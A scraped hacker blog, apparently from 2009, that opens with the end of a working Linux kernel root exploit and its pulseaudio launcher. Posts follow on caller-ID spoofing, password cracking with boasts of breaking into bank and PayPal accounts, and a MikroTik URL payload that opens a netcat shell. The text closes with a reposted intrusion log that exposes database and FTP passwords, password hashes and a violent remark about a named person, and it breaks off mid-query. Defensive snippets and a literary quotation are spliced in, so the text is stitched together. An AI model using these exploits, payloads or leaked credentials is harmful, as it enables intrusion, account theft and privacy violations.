	//selinux_ipv4_ops = (unsigned long *)get_kernel_sym("selinux_ipv4_ops");
	//selinux_ipv6_ops = (unsigned long *)get_kernel_sym("selinux_ipv6_ops");
	security_ops = (unsigned long *)get_kernel_sym("security_ops");
	default_security_ops = get_kernel_sym("default_security_ops");
	//sel_read_bool = get_kernel_sym("sel_read_bool");
	sel_read_enforce = get_kernel_sym("sel_read_enforce");
	//security_get_bool_value = get_kernel_sym("security_get_bool_value");
	//mmap_min_addr = (unsigned long *)get_kernel_sym("mmap_min_addr");
	audit_enabled = (int *)get_kernel_sym("audit_enabled");
	commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
	init_cred = get_kernel_sym("init_cred");
	//sel_fs_type = get_kernel_sym("sel_fs_type");
	//unregister_filesystem = (_unregister_filesystem)get_kernel_sym("unregister_filesystem");

	/* we don't really need to use the NULL mapping for the kernel
	   to redirect to since I could have OR'd another byte in the
	   address and turned it into a regular allocation area.
	   Furthermore, this code can be placed into a file and mmap'd
	   RX to bypass any runtime W^X checks */
	or_one_to_kernel_address((unsigned long)tun_mmap_fop);

	/* two cases, fancy trickery */
	if (sizeof(unsigned int) != sizeof(unsigned long)) {
		// 64bit
		*(char *)1 = '\xff';
		*(char *)2 = '\x25';
		*(unsigned int *)3 = 0; // pc-relative and such yes ;)
		*(unsigned long *)(3 + 4) = (unsigned long)&own_the_kernel;
	} else {
		// 32bit
		*(char *)1 = '\xe9';
		*(unsigned long *)2 = (unsigned long)&own_the_kernel - 6;
	}

	boom_goes_the_dynamite();

	{
		char *msg;
		switch (what_we_do) {
		case 1:
			msg = "AppArmor";
			break;
		case 2:
			msg = "SELinux";
			break;
		case 3:
			msg = "LSM";
			break;
		default:
			msg = "nothing, what an insecure machine!";
		}
		fprintf(stdout, " [+] Disabled security of : %s\n", msg);
	}

	if (got_root == 1)
		fprintf(stdout, " [+] Got root!\n");
	else {
		fprintf(stdout, " [+] Failed to get root :( Something's wrong. Maybe the kernel isn't vulnerable?\n");
		exit(0);
	}

	fprintf(stdout, " [+] BAM! About to launch your rootshell!...but first some chit-chat...\n");
	sleep(3);
	fprintf(stdout, " , ,\n");
	fprintf(stdout, " /(_, ,_)\\\n");
	fprintf(stdout, " \\ _/ \\_ /\n");
	fprintf(stdout, " // \\\\\n");
	fprintf(stdout, " \\\\ (@)(@) //\n");
	fprintf(stdout, " \\'=\"==\"='/\n");
	fprintf(stdout, " ,===/ \\===,\n");
	fprintf(stdout, " \",===\\ /===,\"\n");
	fprintf(stdout, " \" ,==='------'===, \"\n");
	fprintf(stdout, " \" \"\n");
	fprintf(stdout, "Do you know the deadliest catch?\n");
	{
		char buf[20];
		fgets(buf, sizeof(buf)-1, stdin);
	}
	sleep(1);
	fprintf(stdout, "That's right! MAN is the deadliest catch of all!\n");
	sleep(2);
	{
		char wait[] = "WAIIIIIIIIIITTTT....";
		int i;
		for (i = 0; i < sizeof(wait); i++) {
			fprintf(stdout, "%c", wait[i]);
			fflush(stdout);
			usleep(200 * 1000);
		}
	}
	fprintf(stdout, "do you hear it?\n");
	sleep(2);
	fprintf(stdout, "You hear it! You do too! It's not just me! It's here, it's here I say!!\n");
	sleep(3);
	fprintf(stdout, "I must face this....\n");
	fprintf(stdout, "\x7");
	fflush(stdout);
	sleep(1);
	fprintf(stdout, "\x7");
	fflush(stdout);
	sleep(1);
	fprintf(stdout, "\x7");
	fflush(stdout);
	sleep(1);
	fprintf(stdout, "What's this? Something stirs within the beast's belly! Something unexpected");
	fflush(stdout);
	usleep(500 * 1000);
	fprintf(stdout, ".");
	fflush(stdout);
	usleep(500 * 1000);
	fprintf(stdout, ".");
	fflush(stdout);
	usleep(500 * 1000);
	fprintf(stdout, ".");
	fflush(stdout);
	usleep(500 * 1000);
	fprintf(stdout, ".");
	fflush(stdout);
	usleep(500 * 1000);
	fprintf(stdout, "\n");
	sleep(3);
	execl("/bin/sh", "/bin/sh", "-i", NULL);
	return 0;
}

void pa__done(void *m)
{
	return;
}

int main(void)
{
	pa__init(NULL);
}

/* A clock struck noon; Lucien rose. The metamorphosis was complete: a
   graceful, uncertain adolescent had entered this cafe one hour earlier;
   now a man left, a leader among Frenchmen. Lucien took a few steps in
   the glorious light of a French morning. At the corner of Rue des Ecoles
   and the Boulevard Saint-Michel he went towards a stationery shop and
   looked at himself in the mirror: he would have liked to find on his own
   face the impenetrable look he admired on Lemordant's. But the mirror
   only reflected a pretty, headstrong little face that was not yet
   terrible. "I'll grow a moustache," he decided. */

/* d21d0f5d64a84e1bdd2a440fcef3265996f3a1fe */

-----------------------paste here--------------------------------------
save the file as exploits.c
---------------------cut here---------------------------------------


#include <stdio.h>            /* fprintf */
#include <sys/personality.h>  /* personality(), PER_SVR4 */
#include <sys/types.h>
#include <sys/stat.h>         /* stat(), struct stat, S_ISUID */
#include <unistd.h>           /* execl() */

#define PULSEAUDIO_PATH "/usr/bin/pulseaudio"
#define PATH_TO_EXPLOIT "/home/spender/exploit.so"

int main(void)
{
	int ret;
	struct stat fstat;

	/* PER_SVR4 is what lets the loaded module mprotect() the zero page */
	ret = personality(PER_SVR4);

	if (ret == -1) {
		fprintf(stderr, "Unable to set personality!\n");
		return 0;
	}

	fprintf(stdout, " [+] Personality set to: PER_SVR4\n");

	if (stat(PULSEAUDIO_PATH, &fstat)) {
		fprintf(stderr, "Pulseaudio does not exist!\n");
		return 0;
	}

	/* the binary must be setuid root for the personality to survive the exec */
	if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) {
		fprintf(stderr, "Pulseaudio is not suid root!\n");
		return 0;
	}

	/* -L makes pulseaudio dlopen() the module, which calls its pa__init() */
	execl(PULSEAUDIO_PATH, PULSEAUDIO_PATH, "--log-level=0", "-L", PATH_TO_EXPLOIT, NULL);

	return 0;
}


-----------------paste here------------------------

save as pwnkernel.c





On 11/3/09 at 11:37 PM


Voip Hacking

actually this is an old article,
but oh well, rather than having no topic at all, better to just share it :)
heuheuheuheu :P


for Caller ID Spoofing you can use voipbuster

for card spoofing you can use spoofcard

for diagnosing VoIP traffic, or even tracing and taking over other people's lines, you can also use Cain & Abel

feel free to get creative on your own ^_^


thnx

elv1n4



On 10/19/09 at 2:10 AM


The Spread of Malware This Year

This topic comes up because this year many account-takeover cases have used malware or phishing techniques.
yeah yeah yeah. lots of people are after facebook accounts, online banking, email, etc.
The techniques vary a lot; among others there are Social Networks Evil Twin Attacks and ssid-script-injection, which can poison a wireless network and plant malware so that the PCs caught on that network can be taken over by the attacker, heuheuheue :P
very strange; maybe the attacker prefers this route to having to do social engineering, heuheuheuheu :P
let alone using a bot-net to phish other people's accounts.
wow, Indonesia is getting just like China,
lots of bot-net activity.


so be careful about attacks we are not aware of, especially on wireless networks or wired networks. so that our computer does not become a bot / zombie once it has been hit by malware, scan for that malware right away with an antivirus or antimalware.
or you can also download one here
http://www.novirusthanks.org/
heuheuheuheu :P






tHx

ELv1N4



On 9/6/09 at 2:16 PM


ARE YOU SAFE ???

In this case study vina will discuss the concept of password cracking and of protecting against it; there are probably many articles better than this one of vina's.
but here vina only wants to contribute some knowledge on the topic.

ok. let's get straight to it.

===============================================
general definition
===============================================
A password can be described as the key word that protects our important data: for the sake of data security, so that other people cannot view or open a particular file, a password is needed.
===============================================

===============================================
password encryption
===============================================
When a password enters the system, the system receives it as plaintext; but if we want to tighten security, we set the system up to transform the plaintext into a scrambled / "encrypted" passwd, for example:
--------------------------------------------
9205d0de2847ad2a99f4e24d837a97d9 (md5)
elvinadabidu (plaintext)
--------------------------------------------
With that kind of passwd protection an attacker may well be confused about guessing the pass, but an md5-"encrypted" passwd is very easy for crackers to break.
Confused now? why can md5 be broken?
Because md5 is not an encryption algorithm at all. Encryption transforms plain-text into ciphertext whose size is proportional to the size of the original file: the longer the plain-text, the longer the encrypted output. The encrypted output can be turned back into the original plaintext by decryption, so encryption is a two-way, reversible function. Besides that, encryption needs a key; without a key it is not called encryption, only encoding/decoding. md5, by contrast, is a keyless one-way hash: the same input always gives the same digest, so a cracker does not decrypt it at all but simply looks the digest up against digests precomputed from common passwords.
Now md5 has several weaknesses too, such as:
-> the strength of the password itself being so weak
-> many vulns caused by identical hash collisions (IF MD5(X)=MD5(Y) THEN MD5(X+q) = MD5(Y+q))
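To make the point above concrete, here is an added example (mine, not vina's) showing why an unsalted md5 digest of a weak password is matched instantly against a precomputed table, and how a per-user salt plus a slow key-derivation function (PBKDF2-HMAC-SHA256, used here as the mitigation) defeats that lookup; the wordlist, the sample password and the round count are constructed.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed wordlist, standing in for the dictionary an online
# "md5 cracker" keeps precomputed: a few common passwords.
WORDLIST = ["password", "123456", "qwerty", "letmein", "abc123", "elvina"]

# Precomputed table digest -> plaintext. Built once, it answers for every
# unsalted md5 it is ever asked about, which is the whole problem.
MD5_TABLE = {hashlib.md5(w.encode()).hexdigest(): w for w in WORDLIST}


def lookup_md5(digest: str) -> Optional[str]:
    """Recover the plaintext behind an unsalted md5 digest, if the table has it."""
    return MD5_TABLE.get(digest.strip().lower())


# --- the fix: per-user salt + slow key derivation -------------------------
PBKDF2_ROUNDS = 100_000  # constructed value; raise it as hardware allows


def make_record(password: str, salt: Optional[bytes] = None) -> str:
    """Return the stored form 'pbkdf2_sha256$<rounds>$<salthex>$<dkhex>'."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ROUNDS, salt.hex(), dk.hex())


def verify_record(password: str, record: str) -> bool:
    """Recompute the derivation with the stored salt and compare in constant time."""
    algo, rounds, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo(weak: str = "letmein") -> dict:
    """Store the same weak password both ways and report what each scheme gives away."""
    unsalted = hashlib.md5(weak.encode()).hexdigest()
    rec_a = make_record(weak)  # user A
    rec_b = make_record(weak)  # user B, same password, independent salt
    return {
        "md5_recovered": lookup_md5(unsalted),             # 'letmein': one dict lookup
        "salted_records_differ": rec_a != rec_b,           # True: no shared table works
        "verify_ok": verify_record(weak, rec_a),           # True
        "verify_wrong": verify_record(weak + "1", rec_a),  # False
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```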


===============================================
TYPES OF ENCRYPTION ALGORITHMS
===============================================
1. md5,md4,md2
2. sha1
3. sha224
4. sha256
5. sha384
6. sha512
7. base_64
8. rot_13
9. crc32
10.gost
11.salt
12.md5 rainbow
===============================================
HOW TO BREAK THEM
==============================================
1.md5crackeronline
2.salty-py www.code.google.com/p/salty-py/
3.salty-py www.code.google.com/p/salty-py/
4.salty-py www.code.google.com/p/salty-py/
5.salty-py www.code.google.com/p/salty-py/
6.salty-py www.code.google.com/p/salty-py/
7.base64crack www5.rptea.com/base64/
8.your own reasoning, because this pass is weak
9.CRC32 Hash Generator online
10.Encryption Workshop 3.0 Build/altavista
11.bruteforce,insidepro passwordspro
12.http://reusablesec.googlepages.com/drcrack
===============================================

so what happens if this happens to you?
if it does, it will look like the examples below



email attacked by me : smart attack



paypalaccount attacked by me : Bruteforce


account banking attacked by me : Session Extending attack





facebook account attacked by me : SNMP XSS Attack






tHx

ELV1N4



On 9/1/09 at 2:46 AM


mikrotik analysis

these days the more hosts there are, the more workgroups there are that have a router, a.k.a. a server that shares out capacity
heuheuheuheu :P

so a deep curiosity arose about the networking concepts of the mikrotik router and bla bla bla.

so here we'll just learn together, ok.
starting from the concept and definition of the mikrotik router
ok ;)

MikroTik Router is an operating system and software that can be used to turn a computer into a fast network router, with various features built for ip (internet protocol) networks and wireless networks.
in other words it acts as a bridge to the internet network; it has many variants of uses and functions, among others: sharing internet connectivity (bandwidth), blocking whichever sites you want, and serving as one of the firewalls on the network, etc.
for the configuration concepts there is plenty on google.
just search, there's sure to be something :P
heuheuheuheu :P


now here's the thing, the question arises: can we break into a mikrotik server?

the answer is :: impossible is nothing ....
heuheuheuheu :P (such a cool way of putting it, eh)

let's look for a way to get into the winbox and RouterOS network.

heuheuheuheu :P
onwaaaard
in vina's opinion mikrotik is partly firmware with an httpd server that, just like any ordinary server, has vulnerabilities (flaws).
much of the source in the httpd.c found in mikrotik contains vulnerable elements, with the caveat that it may or may not be exploitable.
for example:

http://127.0.0.1/cgi-bin/;command_to_execute
http://127.0.0.1/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

an RCE technique on the router using port 5555
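Added example (not from the post): detection logic a router or web-server admin could run over access-log lines to spot the /cgi-bin/;command injection pattern shown above, including the $IFS whitespace trick and percent-encoded variants; the log lines are constructed and the log format assumed is Common Log Format.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in Common Log Format: two injection
# attempts (the second one percent-encoded) and two ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Sep/2009:02:46:01 +0700] "GET /cgi-bin/;id HTTP/1.1" 200 54
10.0.0.5 - - [01/Sep/2009:02:46:09 +0700] "GET /cgi-bin/%3Buname%24IFS-a HTTP/1.1" 200 88
10.0.0.9 - - [01/Sep/2009:02:47:12 +0700] "GET /cgi-bin/status.cgi?iface=ether1&view=full HTTP/1.1" 200 812
10.0.0.9 - - [01/Sep/2009:02:47:30 +0700] "GET /index.html HTTP/1.1" 200 1337
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Anything under /cgi-bin/ carrying a shell separator, a pipe, a backtick
# or $IFS (the whitespace substitute from the post) is suspect.
SUSPECT_RE = re.compile(r'/cgi-bin/.*(?:[;|`]|\$\{?IFS\}?)')


def normalize(path: str) -> str:
    """Percent-decode twice so %3B and double-encoded %253B both become ';'."""
    return unquote(unquote(path))


def parse_line(line: str):
    """Return the log fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_injection_attempt(path: str) -> bool:
    return SUSPECT_RE.search(normalize(path)) is not None


def scan(log_text: str):
    """Return (client ip, decoded request path) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line; a real pipeline would count these
        if is_injection_attempt(rec["path"]):
            hits.append((rec["ip"], normalize(rec["path"])))
    return hits


if __name__ == "__main__":
    for ip, path in scan(SAMPLE_LOG):
        print("suspect request from", ip, "->", path)
```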


another question :: how do you get the winbox password, to gain broad access to resource sharing etc.?

the answer is :: winbox can be accessed not only through the web, but also through ssh or telnet, or the terminal as well
so we just have to apply some logic here.
we can use bruteforce against the open ports (if the server firewall in winbox has not been configured to block bruteforce attacks).
if that doesn't work (all roads lead to Rome)
heuheuheuheuheu :P
try another one
heuheuheuheu :P
for the method you can use openssh local exploits
the archive can be found anywhere
a bit of breakage is fine, right ;P
once you have the encrypted password, the encryption used is surely crc32.




regard

eLv1N4



On 8/19/09 at 1:34 PM


ASTALAVISTA BEATEN TO A PULP

this security and hacking site, founded in 2001, is certainly no stranger to IT professionals or to the cracker [script kiddie] crowd.
from site-audit contests to open exploration of security systems in the ASTALAVISTA FORUM. And now the site, located at http://astalavista.com, has just been infiltrated by professional HACKERS called the anti-sec group
wow wow . . scary, eh. the team that managed to take down http://milw0rm.com and Hackforums.net, and on 10 July 2009 also attacked the image hosting service http://imageshack.us ..
heuheuheuheu :P
in its action the attacker was able to touch every system inside.
with its R00t access the attacker tried to dissect the entire contents of the site.

let's look at the method used by this formidable attacker
============================================================
anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner...
LiteSpeed
[+] Injecting shellcode...
[-] Wait for it

[~] We g0tshell
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)

sh-3.2$ cat /etc/passwd

sh-3.2$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
80.74.154.172 asta1.astalavistaserver.com

sh-3.2$ pwd
/home/com/public_html

sh-3.2$ ls -la
total 18460
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
drwx--x--x 11 com com 4096 Jun 25 2008 ..
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
drwxrwxrwx 2 com com 4096 May 19 00:50 config
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
-rw-r--r-- 1 com com 8035 May 19 14:26 directory_to_mediadir.php
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
-rw-r--r-- 1 com com 3750 Feb 27 16:12 favicon.ico
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
-rw-r--r-- 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
-rw-r--r-- 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
-rw-r--r-- 1 com com 97496 Jun 2 13:01 index.php
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
-rw-r--r-- 1 com com 26 Feb 2 19:33 robots.txt
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
-rw-r--r-- 1 com com 223 Mar 30 15:32 test.php
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam

sh-3.2$ head -20 index.php

/**
* The main page for the CMS
* @copyright CONTREXX CMS - COMVATION AG
* @author Comvation Development Team
* @version v1.0.9.10.1 stable
* @package contrexx
* @subpackage core
* @link http://www.contrexx.com/ contrexx homepage
* @since v0.0.0.0
* @todo Capitalize all class names in project
* @uses /config/configuration.php
* @uses /config/settings.php
* @uses /config/version.php
* @uses /core/API.php
* @uses /core_modules/cache/index.class.php
* @uses /core/error.class.php
* @uses /core_modules/banner/index.class.php
* @uses /core_modules/contact/index.class.php

sh-3.2$ cd config/
sh-3.2$ ls -la
total 32
drwxrwxrwx 2 com com 4096 May 19 00:50 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php

sh-3.2$ cat configuration.php
[snip]
$_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost
$_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name
$_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix
$_DBCONFIG['user'] = 'contrexxuser2'; // Database username
$_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password
$_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g. mysql,postgres ..)
$_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..)
[snip]
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
$_FTPCONFIG['host'] = 'localhost';// This is normally set to localhost
$_FTPCONFIG['port'] = 21; // Ftp remote port
$_FTPCONFIG['username'] = 'dev@astalavista.com'; // Ftp login username
$_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password
$_FTPCONFIG['path'] = '/'; // Ftp path to cms

sh-3.2$ cd ..
sh-3.2$ cd dvd/
sh-3.2$ ls -la
total 2913780
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
-rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
-rw-r--r-- 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
-rw-r--r-- 1 com com 115 Jan 29 2008 .htaccess

sh-3.2$ cat .htaccess
authType Basic
authName DVD
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
require valid-user

sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
DVDdownload:CRD8cuY6.MPT6
DVDdownload2:CR8a36.wluFMg

sh-3.2$ cat test.php
$url = 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9
pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';
$url = str_replace(array('&', '&'), '&', base64_decode(rawurldecode($url)));
echo $url;
?>

sh-3.2$ cd modifications/
sh-3.2$ ls -la
total 32
drwxr-xr-x 8 com com 4096 May 11 12:48 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp

sh-3.2$ ls -R
.:
com_avtng cronjobs onlinetools pjirc search _tmp

./com_avtng:
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts

./com_avtng/scripts:
popunder.js

./cronjobs:
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp

./cronjobs/tmp:
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv

./onlinetools:
index.php

./pjirc:
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd

./pjirc/img:
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
verre-eau.gif
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
verre-vin.gif
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif

./pjirc/snd:
bell2.au ding.au

./search:
searchEngines.php search.php

./_tmp:
defaultPorts.php defaultPorts.txt

sh-3.2$ cd cronjobs/
sh-3.2$ cat exploits.php
[snip]
$categories = array();
$milw0rmFile = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
$expolits = file($milw0rmFile);
$comExploits = array();
[snip]
// manage data
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640

// get path and title
$expolits[$x] = trim($expolits[$x]);
$path = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' ')));
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);

// check if file exists
if (file_exists($path)) {

$text = file_get_contents($path);

// get content and date
//$text = htmlspecialchars($text, ENT_QUOTES);
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, "UTF-8"));
if ($tmptext != '') {
$text = $tmptext;
} else {
$text = addslashes(htmlentities($text, ENT_QUOTES));
}
$date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com [')));
$tmp = explode('-', $date);
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
$cat = getCategory ($path);
$ext = pathinfo(basename($path));
$ext = $ext['extension'];
$qStr = "
SELECT `id`
FROM `contrexx_module_exploits`
WHERE `title` = '" . $title . "'
AND `date` = '" . $date . "'
";
echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n";
$q = $_objDB->query($qStr);

if ($q->numRows() == 0) {

// prepare array
$comExploits[$x]['date'] = $date;
$comExploits[$x]['title'] = $title;
$comExploits[$x]['author'] = 'milw0rm';
$comExploits[$x]['text'] = $text;
$comExploits[$x]['source'] = $ext;
$comExploits[$x]['url1'] = '';
$comExploits[$x]['url2'] = '';
$comExploits[$x]['catid'] = $cat;
$comExploits[$x]['lang'] = '2';
$comExploits[$x]['userid'] = '12';
$comExploits[$x]['startdate'] = '0000-00-00';
$comExploits[$x]['enddate'] = '0000-00-00';
$comExploits[$x]['status'] = '1';
$comExploits[$x]['changelog'] = $date;

}
[snip]
$xml = '


ASTALAVISTA.com - Exploits
http://www.astalavista.com/exploits
All availably Exploits.
en-us
' . date('F, j M Y H:i:s O') . '
http://blogs.law.harvard.edu/tech/rss
Astalavista.com
info@astalavista.com' . $items . '


';


if (file_exists(FULLPATH . '/feed/exploits.xml')) {
unlink (FULLPATH . '/feed/exploits.xml');
}


file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
[snip]

sh-3.2$ cat exploits.sh
#!/bin/sh
###########################################################
# #
# Title: milw0rm exploits adder #
# Description: Add all milw0rm exploits to the #
# Astalavista.com database #
# #
# Company: Astalavista Group #
# Author: Paulo M. Santos #
# E-Mail: paulo.santos@astalavista.ch #
# #
###########################################################


# path
this_path=/home/com/public_html/modifications/cronjobs

# change directory
cd $this_path
cd tmp/

# delete files
rm -rf milw0rm.tar.* &
rm -rf milw0rm/ &

# wget milw0rm paket
wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2

# extract milw0rm paket
tar -xvf milw0rm.tar.bz2

# change owner
chown -R com .
chgrp -R com .

# execute php script
cd $this_path
php -q exploits.php

# delete files
rm -rf tmp/milw0rm.tar.*
rm -rf tmp/milw0rm/

sh-3.2$ echo "Paulo M. Santos needs to be shot down."
Paulo M. Santos needs to be shot down.

mysql -u contrexxuser2 -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 261694
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| com_contrexx2 |
| com_contrexx2_live |
| test |
+--------------------+
4 rows in set (0.00 sec)

mysql> use com_contrexx2_live
Database changed
mysql> show tables;
227 rows in set (0.01 sec)

mysql> select count(*) as skids from contrexx_access_users;
+-------+
| skids |
+-------+
| 53699 |
+-------+
1 row in set (0.00 sec)

mysql> describe contrexx_access_users;
+------------------+------------------------------------------+------+-----+--------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+------------------+------------------------------------------+------+-----+--------------+----------------+
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
| is_admin | tinyint(1) unsigned | NO | | 0 | |
| username | varchar(40) | YES | MUL | NULL | |
| password | varchar(32) | YES | | NULL | |
| regdate | int(14) unsigned | NO | | 0 | |
| expiration | int(14) unsigned | NO | | 0 | |
| validity | int(10) unsigned | NO | | 0 | |
| last_auth | int(14) unsigned | NO | | 0 | |
| last_activity | int(14) unsigned | NO | | 0 | |
| email | varchar(255) | YES | | NULL | |
| email_access | enum('everyone','members_only','nobody') | NO | | nobody | |
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
| backend_lang_id | int(2) unsigned | NO | | 0 | |
| active | tinyint(1) | NO | | 0 | |
| profile_access | enum('everyone','members_only','nobody') | NO | | members_only | |
| restore_key | varchar(32) | NO | | | |
| restore_key_time | int(14) unsigned | NO | | 0 | |
| u2u_active | enum('0','1') | NO | | 1 | |
+------------------+------------------------------------------+------+-----+--------------+----------------+
18 rows in set (0.00 sec)

mysql> select username,password,email from contrexx_access_users where is_admin = 1;
+------------+----------------------------------+-----------------------------+
| username | password | email |
